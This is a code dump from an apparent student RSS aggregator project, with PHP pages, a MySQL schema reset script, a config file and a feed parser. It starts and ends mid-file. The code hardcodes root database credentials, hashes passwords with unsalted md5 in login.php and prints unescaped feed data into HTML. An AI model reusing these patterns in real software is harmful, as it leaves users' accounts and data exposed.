logged in<br/>');\n print('<a href=\"index.php\">home</a>');\n }\n\n}\n?>" }, { "alpha_fraction": 0.6149068474769592, "alphanum_fraction": 0.6211180090904236, "avg_line_length": 43, "blob_id": "0b03fba8199f7ce52daab5648f9b91a866b20251", "content_id": "febe821a70fd4012786b520b13a603c16aa9bf1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 483, "license_type": "no_license", "max_line_length": 304, "num_lines": 11, "path": "/www/trunk/feedBrowser.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\n\n$db = DB::getSiteDefault();\n$db_feeds = $db->getFeeds();\n$db_feeds->sortByPopularity();\nforeach ($db_feeds as $feed)\n {\n $subscriptions = $feed->getUserCount();\n print(\"<div id=\\\"feed_{$feed->id}\\\"><div style=\\\"float:right;margin-right:0.5em;\\\">{$subscriptions}</div><img onclick=\\\"addFeed('{$feed->id}');\\\" style=\\\"float:left; margin-right:.5em; cursor:pointer;\\\" src=\\\"rss_small.png\\\" alt=\\\"add feed\\\"></img><div class=\\\"feedName\\\">{$feed->name}</div></div>\");\n }\n?>" }, { "alpha_fraction": 0.7748344540596008, "alphanum_fraction": 0.8013244867324829, "avg_line_length": 15.777777671813965, "blob_id": "6a3afe793860796db9352565103a3835da054502", "content_id": "c4f6d1c60564f7ea73901607c5b23fa7e131f0c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 151, "license_type": "no_license", "max_line_length": 32, "num_lines": 9, "path": "/www/trunk/db_def_cfg.ini", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "[MySQLDB]\nusername=root\npassword=adminsql\nhost=watercooler.geogriffin.info\n;port=1234\ndbname=watercooler\n\n[MySQLDB opts]\nPDO::ATTR_PERSISTENT=\"true\"\n" }, { "alpha_fraction": 0.37086236476898193, "alphanum_fraction": 0.38479965925216675, "avg_line_length": 41.32075500488281, "blob_id": "0347c217b1840d66e62de978f5bfb37121e687e6", "content_id": "0ab67951c18b0b220a8fdfa433d172204bfb02e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4592, "license_type": "no_license", "max_line_length": 87, "num_lines": 106, "path": "/email_testing_reset_DB.py", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.6\r\n\r\nimport sys\r\nimport MySQLdb\r\n\r\nconn = MySQLdb.connect (host = \"localhost\",\r\n user = \"root\",\r\n passwd = \"adminsql\",\r\n db = \"watercooler\")\r\ncursor = conn.cursor ()\r\n\r\ncursor.execute (\"DROP TABLE IF EXISTS users;\")\r\ncursor.execute (\"\"\"\r\n CREATE TABLE users\r\n (\r\n uid int(16) NOT NULL UNIQUE auto_increment,\r\n username varchar(32) NOT NULL UNIQUE,\r\n password varchar(32) NOT NULL,\r\n first_name varchar(32),\r\n last_name varchar(32),\r\n phone_number varchar(16) NOT NULL UNIQUE,\r\n email varchar(32) NOT NULL UNIQUE,\r\n status int(4) NOT NULL,\r\n cid int(16) NOT NULL,\r\n PRIMARY KEY (uid),\r\n FOREIGN KEY (cid) REFERENCES carriors(cid)\r\n );\r\n \"\"\")\r\ncursor.execute (\"DROP TABLE IF EXISTS receptions;\")\r\ncursor.execute (\"\"\"\r\n CREATE TABLE receptions\r\n (\r\n uid int(16) NOT NULL,\r\n rid int(16) NOT NULL,\r\n FOREIGN KEY (uid) REFERENCES users(uid),\r\n FOREIGN KEY (rid) REFERENCES reception_methods(rid)\r\n );\r\n \"\"\")\r\n
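# Illustrative aside (hypothetical values): MySQL parses the REFERENCES\r\n# clauses above, but only the InnoDB engine enforces them; on the old MyISAM\r\n# default they are informational. Once the tables exist, a parameterized\r\n# insert through MySQLdb looks like:\r\n# cursor.execute (\"INSERT INTO carriors (carrior_name) VALUES (%s);\", (\"Verizon\",))\r\n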
cursor.execute (\"DROP TABLE IF EXISTS reception_methods;\")\r\ncursor.execute (\"\"\"\r\n CREATE TABLE reception_methods\r\n (\r\n rid int(16) NOT NULL UNIQUE auto_increment,\r\n method_type varchar(32) NOT NULL,\r\n PRIMARY KEY (rid)\r\n );\r\n \"\"\")\r\ncursor.execute (\"DROP TABLE IF EXISTS carriors;\")\r\ncursor.execute (\"\"\"\r\n CREATE TABLE carriors\r\n (\r\n cid int(16) NOT NULL UNIQUE auto_increment,\r\n carrior_name varchar(32) NOT NULL,\r\n PRIMARY KEY (cid)\r\n );\r\n \"\"\")\r\ncursor.execute (\"DROP TABLE IF EXISTS favorites;\")\r\ncursor.execute (\"\"\"\r\n CREATE TABLE favorites\r\n (\r\n uid int(16) NOT NULL,\r\n sid int(16) NOT NULL,\r\n priority int(8) NOT NULL,\r\n FOREIGN KEY (uid) REFERENCES users(uid),\r\n FOREIGN KEY (sid) REFERENCES feed_sources(sid)\r\n );\r\n \"\"\")\r\ncursor.execute (\"DROP TABLE IF EXISTS feed_sources;\")\r\ncursor.execute (\"\"\"\r\n CREATE TABLE feed_sources\r\n (\r\n sid int(16) NOT NULL UNIQUE auto_increment,\r\n source_name varchar(32) NOT NULL,\r\n source_url varchar(256) NOT NULL,\r\n PRIMARY KEY (sid)\r\n );\r\n \"\"\")\r\ncursor.execute (\"DROP TABLE IF EXISTS feed_stories;\")\r\ncursor.execute (\"\"\"\r\n CREATE TABLE feed_stories\r\n (\r\n fid int(16) NOT NULL UNIQUE auto_increment,\r\n title varchar(256) NOT NULL,\r\n content varchar(256) NOT NULL,\r\n url varchar(256) NOT NULL,\r\n time_stamp int(16) NOT NULL,\r\n sid int(16) NOT NULL,\r\n gid int(16) NOT NULL,\r\n PRIMARY KEY (fid),\r\n FOREIGN KEY (sid) REFERENCES feed_sources(sid),\r\n FOREIGN KEY (gid) REFERENCES feed_categories(gid)\r\n );\r\n \"\"\")\r\ncursor.execute (\"DROP TABLE IF EXISTS feed_categories;\")\r\ncursor.execute (\"\"\"\r\n CREATE TABLE feed_categories\r\n (\r\n gid int(16) NOT NULL UNIQUE auto_increment,\r\n category varchar(32) NOT NULL,\r\n PRIMARY KEY (gid)\r\n );\r\n \"\"\")\r\n\r\nconn.commit ()\r\ncursor.close ()\r\nconn.close ()\r\n" }, { "alpha_fraction": 0.5834242105484009, "alphanum_fraction": 0.5845147371292114, "avg_line_length": 24.783782958984375, "blob_id": "bddaaf34c9d8387e0ca96804d694f513d0869412", "content_id": "32f94efd2daa351cffd8a266a8b51c3e8567cd96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 917, "license_type": "no_license", "max_line_length": 70, "num_lines": 37, "path": "/www/trunk/login.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('common.php');\nrequire_once('db_init.php');\n\nsession_start();\n\nif(isset($_REQUEST['userName']) && isset($_REQUEST['userPassword']))\n {\n $sessionUser = User::find('username',$_REQUEST['userName']);\n if ($sessionUser == NULL)\n {\n\techo 'This username does not exist';\n\texit();\n }\n if($sessionUser->password == md5($_REQUEST['userPassword']))\n {\n\tif($sessionUser->email_confirmed)\n\t {\n\t $_SESSION['uid'] = $sessionUser->uid;\n\t $_SESSION['password'] = $sessionUser->password;\n\n\t header(\"Location: {$page_uri_base}\");\n\t }\n\telse\n\t {\n\t echo 'You have not yet confirmed your email. If you need the '.\n\t 'confirmation email to be resent, please click '.\n\t \"<a href=\\\"sendConfirmation.php?id={$sessionUser->id}\\\">\".\n\t 'here</a>.';\n\t }\n }\n else\n {\n\techo 'This password does not match the username. 
Please try again.';\n\texit();\n }\n }\n" }, { "alpha_fraction": 0.4571428596973419, "alphanum_fraction": 0.48571428656578064, "avg_line_length": 12.800000190734863, "blob_id": "9a2a61bb103ed287b1c75c69856378425c289134", "content_id": "3e52187fd9e11dd0f820b65d33488d3ad17c6e72", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 70, "license_type": "no_license", "max_line_length": 21, "num_lines": 5, "path": "/www/trunk/rss/stripFooter.sh", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\ntouch temp;\nsed '$d' < $1 > temp;\nsed '$d' < temp > $1;\n " }, { "alpha_fraction": 0.6682499051094055, "alphanum_fraction": 0.6862002611160278, "avg_line_length": 33.04224395751953, "blob_id": "e6479e24d68774a5ed925ee14d6106e0319bead5", "content_id": "07c43526991ffaadcc0c10df837f190c31bf6950", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 46740, "license_type": "no_license", "max_line_length": 153, "num_lines": 1373, "path": "/FeedRetriever.py", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.6\n\n# This is a sample \"driver\" to use a module called feedparser to\n# \tdownload, parse, and display RSS feed data.\n# To use this program, install Python 2.6.4.\n# Then go to http://code.google.com/p/feedparser/downloads/list\n# \tdownload feedparser-4.1.zip\n# Then, open a cmd shell, type: python setup.py install\n# Then, you can use this program as usual.\n\n\"\"\"\nVersion LOG\n\n1.0:\nElementary testing version\n\n2.0:\nAble to read RSS and eliminate some HTML trash\n\n3.0:\norganize some code and improved debug-ability\nReordered license information\nWeek 3 Demo version\n\n4.0: \nAble to read and process ATOM as well\n\n4.1:\nOrganized and commented in functions\nWeek 4 Demo version\n\n4.2:\nRevised the content processing function,\nAble to remove trash more robustly\n\n4.3:\nLeo testing edition\n\n4.3.1_TEST:\nNow get description before content for content field,\naffecting ATOM feeds only\nAlso changed _ContentCutter\n\n4.3.2_TEST:\nModularize more codes into helper functions\nOrganized the \"myfeed\" so that we can keep track which works and\nwhich does not work\n\n4.4_TEST:\nLeo modified _ContentCutter to ensure correctness\n\n5.0:\nRSS:\n\tImprove robustness against empty fields\n\tintroduce logging\n\tmake use of time function (converge all time into UNIX format)\n\tIntroduce Stories (list of list) to behave as specified\n\n5.1:\nFixed some confusing printout names\nATOM:\n\tImprove robustness against empty fields\n\tintroduce logging\n\tmake use of time function (converge all time into UNIX format)\n\tIntroduce Stories (list of list) to behave as specified\n\n5.2:\nFixed extra print statements\nImplement subsequent ContentCutting functions to further process impurities\n\t1: remove extra whitespace (__DuplicateSpace)\n\t2: remove all subsequent sentences if we find:\n\t\t\tmultiple packed \\n or \\n seperated with (spaces or tabs) (__AdsFilter)\n\t3: remove all words from end, up to a list of \"whitelist\" allowable ending\n\t\t\tif such ending is not detected, this \"remover\" does nothing (__AdsFilter)\n\n5.3:\nTesting of above codes works or not\nFixed bug by removing ':' as LegalEndings\nFixed bug of __AdsFilter on ending with 'H.264' using regular expression\nCurrently __AdsFilter does nothing towards non-ascii texts, and we do not aim to process 
those\nFixed bug of possibility of trailing whitespace and newlines (eg space after newline), which would escape __AdsFilter check\n\n5.3.1:\nCategory testing included, most RSS feeds have no such information\nmore testing feeds added\n\n5.4\nreplace '&lt;' '&gt;' unicode phrases. This is essential for __HTMLCutter to work\nreplace '&nbsp;' phrases. This seems to be the only HTML leftovers\nFixed possibility of RSS feed entries to have time stamp 0 (in this case we use the feed's time stamp)\n\n5.4.1\nModularize to work with driver script\n\n5.4.2\nAdded more simple filters (remove leading whitespace and \\n)\n\n6.0 Test\nIncluded database codes, given by Ricky\nALL PRELIMINARY CODING DONE\nTests pending (will be done soon afterwards)\n\n6.0.1 Test\nFixed some syntax errors\nFrom now on, testing is done on server, using python 2.6.5\nCode freeze for Friday discussion for consensus\n\n6.0.2 Test\nFixing feed title name matching, algorithm flaws\nFix to a point ON DUPLICATE KEY UPDATE c=c+1;\ncode freeze until solution found\n\n6.1 Beta\nNo \"compile\" error\nMore testing needs to be done on more feeds\n\n6.1.1 Beta\nfixed some minor errors\ndefault debug flag is false, will not print unless exceptional case\nOnly one line feed title is displayed for each feed!\n\n6.1.2 Beta\nfixed some minor errors (;)\n\n6.1.3 Beta\nRealized more bugs on unicode, fixed (&mdash;)\nFixed some more index-out-of-bounds issues\n\n6.1.4 Beta Tested\nTested with email server, emails successfully sent\n\n6.2 Test\nImproving efficiency: checking time stamp before processing content\n\tavoiding need to remove extra stories later also\nCorrected some more stupid serious bugs (ContentCutter)\n\n6.3 Test\nAdd another Filter to filter away difficult-to-remove advertisements\n\tcurrently, most advertisements are deleted, all unit test cases give \"perfect\" results\n\n6.3.1 Test\nConverted by default to non-unicode before storing to database for a unified format\n\n6.3.2 Test\nFurther added more unicode conversion functions\n\n6.3.3 Test\nModified CutterHTML to handle weird case (mismatching number of < >)\nreverted 6.3.1 change, as it may cause faulting error (crashes)\n\n6.3.4 Test\nResearched unicode again, trying another method to robustly convert\nall unicode to ascii for database \"insert\" and email servers, to avoid crashing\nbasically, it's \"ignoring\" unconvertible chars, rather than raising exceptions\n\n6.3.5 Test\nVerified stories output identical to 6.1.4\nOptimized the logic of __AdsFilter and __AdvAdsFilter\nThis is used for performance test\n\n6.3.6 Test\nAdded missing thing (from local version)\nAdding additional checks to avoid crashing due to these URLs\n\t- Valid URL but not a feed ('www.yahoo.com')\n\t- Invalid URL ('iaminvalid')\n\t- empty URL ('')\n\n6.4 Beta\nTested with Tim's Email server and a total of 46 emails and texts sent\nAll received as intended\n\n6.5 Bug test\nFixing the duplicate email bug\nadded tons of print messages in default mode, to be removed later\nidentified bug reason, hypothesis made\n\n6.5.1 Test\nreplaced SQL code in UpdateFeed()\nAdded logic not to add existing entry\n\n6.6 Test\nAppeared to work, now run it on the server for a day to see\nModifying driver also to cooperate\n\n6.6.1 Test\nAdded even more unicode conversion as bugs found\n\n6.6.2 Test\nMake debug log look nicer\nTry to resolve bugs where the title can't match in some rare scenarios\n\n6.6.3 Test\nChanged title to be normalized from unicode, avoiding failure to match in rare cases\nchanging story definition once again to contain 
more information\n# old story is [Feed Title, Entry Title, Entry Content, Entry Category, Entry URL, Entry Timestamp]\n# new story is [Feed Title, Feed URL, Entry Title, Entry Content, Entry Category, Entry URL, Entry Timestamp]\nThis will not affect email server in any way\n\n6.6.4 Test\nchanged empty content \"default\" to nicer version as Matt suggested\n\n6.6.5 Beta\nThe 6.6.4 is tested, giving intended behaviour.\n*** Starting new branch below ***\n\n6.7 Test\nChanged \"story\" to be per-feed specific, to facilitate reducing the number of emails sent:\n[Feed Title, Feed URL, [Entry Titles], [Entry Contents], [Entry Categories], [Entry URLs], [Entry Timestamps]]\nadded more comments to make code more readable\n\n6.8 Test\nFixed duplicate email bug\n\n7.0 Beta\nUnless more bugs are found, this is the version for public demo\n\n7.0.1 Beta\nPut length limit of title to 255 also (in addition to content)\n\n7.1 Release\nFixed duplicate email bug!\n\n------ CODE FREEZE UNTIL BUGS FOUND -------\n------ USE 7.1 TO TEST! -----------------\n\nFuture:\nadd threads to parallelize processing when a list of URLs is obtained\n\n\"\"\"\n\n\n# handle time stamps\nimport time\n\n# handle regular expressions\nimport re\n\n# import the feed parsing module\nimport feedparser\n\n# handle unicode\nimport codecs\nimport unicodedata\n\n# handle database\nimport sys\nimport MySQLdb\n\n\n# define ending characters, and check against them\n# return true if the char is an element of LegalEndings, false otherwise\n# verified logic\ndef __CheckEnding(ending):\n\tLegalEndings = [']', '...', '.', '!', '?', '\"', '\\'']\n\tEndings = set(LegalEndings)\n\t# is 'ending' in the set? True/False\n\tresult = ending in Endings\n\treturn result\n\n\n# a function to replace the corresponding unicode entities with '<' and '>', for __CutterHTML to work\n# verified logic\ndef __PreHTMLUnicode(content):\n\tfor index in (range((len(content))-3)):\n\t\tending = index+4\n\t\tif (content[index:ending] == '&lt;'):\n\t\t\tnewcontent = content[:index] + '<' + content[ending:]\n\t\t\treturn __PreHTMLUnicode(newcontent)\n\t\tif (content[index:ending] == '&gt;'):\n\t\t\tnewcontent = content[:index] + '>' + content[ending:]\n\t\t\treturn __PreHTMLUnicode(newcontent)\n\treturn content\n\n\n# functions to replace corresponding unicode entities with ascii values\n# they are necessary to help the python library, improving \"visual correctness\"\n# verified logic\ndef __ProHTMLUnicodeSpace(content):\n\tfor index in (range((len(content))-5)):\n\t\tending = index+6\n\t\tif (content[index:ending] == '&nbsp;'):\n\t\t\tnewcontent = content[:index] + ' ' + content[ending:]\n\t\t\treturn __ProHTMLUnicodeSpace(newcontent)\n\t\tif (content[index:ending] == '&#149;'):\n\t\t\tnewcontent = content[:index] + '.' 
+ content[ending:]\n\t\t\treturn __ProHTMLUnicodeSpace(newcontent)\n\treturn content\n\ndef __ProHTMLUnicodeDash(content):\n\tfor index in (range((len(content))-6)):\n\t\tending = index+7\n\t\tif (content[index:ending] == '&mdash;'):\n\t\t\tnewcontent = content[:index] + '--' + content[ending:]\n\t\t\treturn __ProHTMLUnicodeDash(newcontent)\n\t\tif (content[index:ending] == '&#8217;'):\n\t\t\tnewcontent = content[:index] + '\\'' + content[ending:]\n\t\t\treturn __ProHTMLUnicodeDash(newcontent)\n\t\tif (content[index:ending] == '&#8211;'):\n\t\t\tnewcontent = content[:index] + '-' + content[ending:]\n\t\t\treturn __ProHTMLUnicodeDash(newcontent)\n\t\tif (content[index:ending] == '&#8212;'):\n\t\t\tnewcontent = content[:index] + '--' + content[ending:]\n\t\t\treturn __ProHTMLUnicodeDash(newcontent)\n\t\tif ((content[index:ending] == '&#8221;') or (content[index:ending] == '&#8220;')):\n\t\t\tnewcontent = content[:index] + '\"' + content[ending:]\n\t\t\treturn __ProHTMLUnicodeDash(newcontent)\n\t\tif (content[index:ending] == '&#8226;'):\n\t\t\tnewcontent = content[:index] + '.' + content[ending:]\n\t\t\treturn __ProHTMLUnicodeDash(newcontent)\n\treturn content\n\n\n# a function to remove duplicate whitespace in content\n# verified logic\ndef __DuplicateSpace(content):\n\tfor index in (range((len(content))-1)):\n\t\tending = index+2\n\t\tif (content[index:ending] == ' '):\n\t\t\tnewcontent = content[:index+1] + content[ending:]\n\t\t\treturn __DuplicateSpace(newcontent)\n\treturn content\n\n\n# remove trailing space and newlines\ndef __TrailingSpace(content):\n\tlast = len(content)-1\n\tif (last >= 0):\n\t\tif ((content[last] == '\\n') or (content[last] == ' ')):\n\t\t\treturn __TrailingSpace(content[:last])\n\t\telse:\n\t\t\treturn content\n\telse:\n\t\treturn content\n\n\n# remove leading space and newlines\ndef __LeadingSpace(content):\n\tlength = len(content)\n\tif (length > 0):\n\t\tif ((content[0] == '\\n') or (content[0] == ' ')):\n\t\t\treturn __LeadingSpace(content[1:])\n\t\telse:\n\t\t\treturn content\n\telse:\n\t\treturn content\n\n\n# a function to remove trash words at the end of content\n# lemma: There is no useful information after this syntax: 'legal_ending' [space]* \\n [space]* \\n\ndef __AdsFilter(content):\n\t# define CHARS_SET\n\tCHARS_SET = re.compile(r'[a-zA-Z0-9]')\n\tlast_legal_pos = 0\n\tendpos = 0\n\t# find last legal ending position\n\tfor index in range(len(content)):\n\t\tif (__CheckEnding(content[index])):\n\t\t\tlast_legal_pos=index\n\t# last_legal_pos if == 0, means cant remove anything\n\tif (last_legal_pos != 0):\n\t\tendpos = 0\n\t\tend = len(content)\n\t\tcurrent = last_legal_pos + 1\n\t\tnewcurr = 0\n\t\t# detect non-space position, from legal_ending_position to end\n\t\t# checking this: is it all space?\n\t\tfor index in range(current, end):\n\t\t\tif content[index] != ' ':\n\t\t\t\tnewcurr = index\n\t\t\t\tbreak\n\t\t# immediate end noticed, that means trailing whitespace only\n\t\t# newcurr == 0 since it is never assigned with 'index' above\n\t\tif (newcurr == 0):\n\t\t\treturn content[:current]\n\n\t\t# reaching here means found non-space chars (potentially trash)\n\t\t# setup the \"range\" properly..., start from last_legal_pos + 1\n\t\tnewcurr = current\n\t\t# extra code to proceed some special scenario (eg H.264) (basically preserve more characters)\n\t\t# effect: stop at the position when it can no longer find chars or digits after '.' 
eg\n\t\tfor index in range (newcurr, end):\n\t\t\tif (not (bool(CHARS_SET.search(content[index])))):\n\t\t\t\tcurrent = index\n\t\t\t\tbreak\n\t\t# now skip some space if there is any, set \"current\" to pos of \"first non-space\"\n\t\tnewcurr = current\n\t\tfor index in range (newcurr, end):\n\t\t\tif content[index] != ' ':\n\t\t\t\tcurrent = index\n\t\t\t\tbreak\n\n\t\t# check if multiple \\n follow, only separated by spaces if there is any\n\t\t# then we conclude anything afterwards is trash (likely ADs)\n\t\t# lemma: There is no useful information after this syntax: 'legal_ending' [space]* \\n [space]* \\n\n\t\tif (content[current] == '\\n'):\n\t\t\tcurrent = current + 1\n\t\t\tfor index in range(current, end):\n\t\t\t\tif (content[index] == '\\n'):\n\t\t\t\t\tendpos = index + 1\n\t\t\t\t\tbreak\n\t\t\t\tif ((content[index] != ' ') and (content[index] != '\\n')):\n\t\t\t\t\tendpos = 0\n\t\t\t\t\tbreak\n\t# did we actually find trash to remove? (checking endpos)\n\tif (endpos != 0):\n\t\treturn content[:endpos]\n\telse:\n\t\treturn content\n\n\n\n# an advanced function to remove more trash content\n# lemma: There is no useful information after the former legal ending,\n# when there are two legal endings,\n# and the previous one is immediately separated by the following syntax:\n# '2nd last legal ending' [space]* \\n [space]* \\n [space]* \\n [space]* \\n\ndef __AdvAdsFilter(content):\n\tlegal_pos = 0\n\tprevious_legal_pos = 0\n\tnl_count = 0\n\t\n\t# find last legal ending position\n\tfor index in range(len(content)):\n\t\tif (__CheckEnding(content[index])):\n\t\t\tprevious_legal_pos = legal_pos\n\t\t\tlegal_pos = index\n\n\tendpos = 0\n\t# if legal_pos == 0 or previous_legal_pos == 0, we cannot remove anything\n\tif ((previous_legal_pos != 0) and (legal_pos != 0)):\n\t\t# check that previous_legal_pos is followed by the lemma conditions above\n\t\tend = len(content)\n\t\tcurrent = previous_legal_pos+1\n\t\tnewcurr = current\n\t\tfor index in range(newcurr, end):\n\t\t\tif (content[index] == '\\n'):\n\t\t\t\tnl_count = nl_count + 1\n\t\t\tif ((content[index] != '\\n') and (content[index] != ' ')):\n\t\t\t\tbreak\n\t\t\tif (nl_count == 4):\n\t\t\t\tendpos = current + 1\n\t\t\t\tbreak\n\n\tif (endpos != 0):\n\t\treturn content[:endpos]\n\telse:\n\t\treturn content\n\n\n# a function to remove trash, specifically HTML codes, from content\ndef __CutterHTML(content):\n\tflag = 0\n\tfor index in range(len(content)):\n\t\tif (content[index] == '<'):\n\t\t\tstart_pos = index\n\t\t\tflag = 1\n\t\tif (content[index] == '>'):\n\t\t\tif (flag == 0):\n\t\t\t\tnewcontent = content[:index] + ' ' + content[index+1:]\n\t\t\t\treturn __CutterHTML(newcontent)\n\t\t\telse:\n\t\t\t\tend_pos = index\n\t\t\t\tbreak\n\n\tif (flag == 1): \t\t\n\t\tnew_content = content[:start_pos] + ' ' + content[end_pos+1:]\n\t\treturn __CutterHTML(new_content)\n\telse:\n\t\treturn content\n\n# an overall, main function to link up all content processing functions\n# this enables us to add more filters without modifying much code\ndef _ContentCutter(content):\n\tmycontent0 = __PreHTMLUnicode(content)\n\tmycontent1 = __CutterHTML(mycontent0)\n\tmycontent2 = __AdsFilter(mycontent1)\n\tmycontent2n = __AdvAdsFilter(mycontent2)\n\tmycontent3 = __DuplicateSpace(mycontent2n)\n\tmycontent4 = __TrailingSpace(mycontent3)\n\tmycontent5 = __ProHTMLUnicodeSpace(mycontent4)\n\tmycontent6 = __ProHTMLUnicodeDash(mycontent5)\n\tmycontent7 = __LeadingSpace(mycontent6)\n\treturn mycontent7\n\n
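# Illustrative sketch of the pipeline above (hypothetical input; the exact\n# output depends on the filters' heuristics):\n#\tdirty = '<p>Breaking&nbsp;news!</p>\\n\\n\\nSubscribe now'\n#\t_ContentCutter(dirty) strips the tags, collapses duplicate whitespace and\n#\tdrops the trailing ad-like text, yielding something like 'Breaking news!'\ndef _ContentCutterD(content):\n\t# a 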
debugging content cutter to print intermediate value\n\t\"\"\"\n\tdebuglc = codecs.open('debuglc.txt', encoding='utf-8', mode='w')\n\tdebuglc.write('------\\n')\n\tdebuglc.write(content + '\\n')\n\tdebuglc.write('------\\n')\n\tmycontent0 = __PreHTMLUnicode(content)\n\tdebuglc.write('000000\\n')\n\tdebuglc.write(mycontent0 + '\\n')\n\tdebuglc.write('000000\\n')\n\tmycontent1 = __CutterHTML(mycontent0)\n\tdebuglc.write('111111\\n')\n\tdebuglc.write(mycontent1 + '\\n')\n\tdebuglc.write('111111\\n')\n\tmycontent2 = __AdsFilter(mycontent1)\n\tdebuglc.write('222222\\n')\n\tdebuglc.write(mycontent2 + '\\n')\n\tdebuglc.write('222222\\n')\n\tmycontent2n = __AdvAdsFilter(mycontent2)\n\tdebuglc.write('2n2n2n\\n')\n\tdebuglc.write(mycontent2n + '\\n')\n\tdebuglc.write('2n2n2n\\n')\n\tmycontent3 = __DuplicateSpace(mycontent2n)\n\tdebuglc.write('333333\\n')\n\tdebuglc.write(mycontent3 + '\\n')\n\tdebuglc.write('333333\\n')\n\tmycontent4 = __TrailingSpace(mycontent3)\n\tdebuglc.write('444444\\n')\n\tdebuglc.write(mycontent4 + '\\n')\n\tdebuglc.write('444444\\n')\n\tmycontent5 = __ProHTMLUnicodeSpace(mycontent4)\n\tdebuglc.write('555555\\n')\n\tdebuglc.write(mycontent5 + '\\n')\n\tdebuglc.write('555555\\n')\n\tmycontent6 = __ProHTMLUnicodeDash(mycontent5)\n\tdebuglc.write('666666\\n')\n\tdebuglc.write(mycontent6 + '\\n')\n\tdebuglc.write('666666\\n')\n\tmycontent7 = __LeadingSpace(mycontent6)\n\tdebuglc.write('777777\\n')\n\tdebuglc.write(mycontent7 + '\\n')\n\tdebuglc.write('777777\\n')\n\t\"\"\"\n\tprint '------'\n\tprint content\n\tprint '------'\n\tmycontent0 = __PreHTMLUnicode(content)\n\tprint '000000'\n\tprint mycontent0\n\tprint '000000'\n\tmycontent1 = __CutterHTML(mycontent0)\n\tprint '111111'\n\tprint mycontent1\n\tprint '111111'\n\tmycontent2 = __AdsFilter(mycontent1)\n\tprint '222222'\n\tprint mycontent2\n\tprint '222222'\n\tmycontent2n = __AdvAdsFilter(mycontent2)\n\tprint '2n2n2n'\n\tprint mycontent2n\n\tprint '2n2n2n'\n\tmycontent3 = __DuplicateSpace(mycontent2n)\n\tprint '333333'\n\tprint mycontent3\n\tprint '333333'\n\tmycontent4 = __TrailingSpace(mycontent3)\n\tprint '444444'\n\tprint mycontent4\n\tprint '444444'\n\tmycontent5 = __ProHTMLUnicodeSpace(mycontent4)\n\tprint '555555'\n\tprint mycontent5\n\tprint '555555'\n\tmycontent6 = __ProHTMLUnicodeDash(mycontent5)\n\tprint '666666'\n\tprint mycontent6\n\tprint '666666'\n\tmycontent7 = __LeadingSpace(mycontent6)\n\tprint '777777'\n\tprint mycontent7\n\tprint '777777'\n\t\n\treturn mycontent7\n\n# a helper function to display global feed information\ndef _DisplayGlobal(myfeed, type):\n\t# calculate how many \"entries\" in the feed\n\tn_entries = len(myfeed['entries'])\n\tprint 'There are' , n_entries , 'entries in the feed'\n\n\t# print details of the feeds (global):\n\tif myfeed.feed.has_key('title'):\n\t\tprint 'Feed Title:' , myfeed.feed.title\n\tif myfeed.feed.has_key('link'):\n\t\tprint 'Feed Link: ', myfeed.feed.link\n\tif (type == 'RSS'):\n\t\t#if myfeed.feed.has_key('description'):\n\t\t#\tprint 'Feed Description: ', myfeed.feed.description\n\t\tif myfeed.feed.has_key('date'):\n\t\t\tprint 'Feed Date: ', myfeed.feed.date\n\t\t\t# print 'Feed Date (in list form): ', myfeed.feed.date_parsed\n\telif (type == 'ATOM'):\n\t\t#if (myfeed.feed.has_key('subtitle') and (len(myfeed.feed.subtitle) != 0)):\n\t\t#\tprint 'Feed Subtitle:' , myfeed.feed.subtitle\n\t\tif myfeed.feed.has_key('updated'):\n\t\t\tprint 'Feed Date: ', myfeed.feed.updated\n\t\t\t# print 'Feed Date (in list form): ', myfeed.feed.updated_parsed\n\tif 
myfeed.feed.has_key('categories'):\n\t\tprint 'Feed Categories:' ,myfeed.feed.categories\n\telse:\n\t\tprint 'This feed does not contain category information'\n\n\treturn\n\n\n# a specialized function to parse and process RSS feeds\n#\tinput: f = local file to write to\n#\t\t log = local log for error\n#\t\t myfeed = feedparser parsed object\n# latest_ts = latest time stamp, of all feeds in the database\n# feedurl = the URL of the feed\n# output: A story, containing all new entries, as:\n# [Feed Title, Feed URL, [Entry Titles], [Entry Contents], [Entry Categories], [Entry URLs], [Entry Timestamps]]\n# Note, for no new entries, the output will be [] AND NOT:\n# [Feed Title, Feed URL, [], [], [], [], []]\n\ndef _RSS(f, log, myfeed, latest_ts, feedurl, debug):\n\t# intialize the story, and corresponding entries lists\n\t# story is [Feed Title, Feed URL, [Entry Titles], [Entry Contents], [Entry Categories], [Entry URLs], [Entry Timestamps]]\n\tstory = []\n\tentrytitle_list = []\n\tentrycontent_list = []\n\tentrycategory_list = []\n\tentryURL_list = []\n\tentry_ts_list = []\n\n\tif ((myfeed is None) or (myfeed.feed is None)):\n\t\treturn story\n\n\t# calculate how many \"entries\" in the feed\n\tn_entries = len(myfeed['entries'])\n\n\t# print details of the feeds (global):\n\tif (debug):\n\t\t_DisplayGlobal(myfeed,'RSS')\n\n\t# get feed title\n\tfeedtitle = 'Undefined'\n\tif myfeed.feed.has_key('title'):\n\t\tfeedtitle = myfeed.feed.title\n\t\tfeedtitle = unicodedata.normalize('NFKD', feedtitle).encode('ascii','ignore')\n\t\tfeedtitle = feedtitle[:240]\n\n\tprint 'Feed Title:' , feedtitle\n\n\tprint 'LC DEBUG LATEST_TS IN RSS', str(latest_ts)\n\t# write all entries parsed on local file\n\tfor count in range(n_entries):\n\t\t# check time_stamp of the entry before proceeding\n\t\t# to avoid processing something we will trash!\n\t\t# convert Universal Feed Parser generated time (tuple) into UNIX time\n\t\tUNIX_time = 0\n\t\tif myfeed.entries[count].has_key('date_parsed'):\n\t\t\tdate_parsed = 